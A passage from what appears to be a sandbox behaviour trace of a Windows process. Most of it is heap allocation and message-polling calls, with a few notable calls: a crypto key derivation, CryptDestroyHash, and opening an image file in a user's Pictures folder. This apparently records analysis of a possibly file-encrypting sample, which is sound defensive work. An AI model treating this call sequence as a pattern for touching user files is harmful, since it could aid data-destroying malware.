hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.290] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.293] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.293] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.294] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.294] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.294] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.294] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.294] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.295] CryptDestroyHash (hHash=0xaa5820) returned 1 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/QrlF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qrlf.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0256.297] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.297] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0256.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, 